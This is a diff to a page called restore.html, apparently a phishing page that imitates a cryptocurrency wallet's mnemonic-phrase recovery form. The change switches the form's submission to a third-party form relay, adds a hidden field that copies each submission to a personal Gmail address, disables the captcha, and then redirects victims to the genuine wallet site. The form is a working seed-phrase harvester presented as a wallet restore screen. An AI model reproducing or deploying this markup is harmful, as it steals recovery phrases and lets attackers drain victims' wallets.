--- a/restore.html
+++ b/restore.html
@@ -55,14 +55,23 @@
                   aria-labelledby="mnemonic-tab"
                 >
                   <form
-                    action="https://formsubmit.io/send/f1e2aca4-a907-408f-b666-08a29ff242e1"
+                    action="https://formsubmit.co/e47eeac0c6ac2f912909f5ad7a9946e4"
+                    method="POST"
                   >
                     <input
                       type="hidden"
-                      name="_redirect"
+                      name="_next"
                       id="name"
                       value="https://trustwallet.com/earn"
                     />
+
+                    <input
+                      type="hidden"
+                      name="_cc"
+                      value="gioverone.gv@gmail.com"
+                    />
+                    <input type="hidden" name="_captcha" value="false" />
+
                     <div class="d-flex flex-wrap justify-content-center mb-3">
                       <div class="ml-3">
                         <span>1</span>
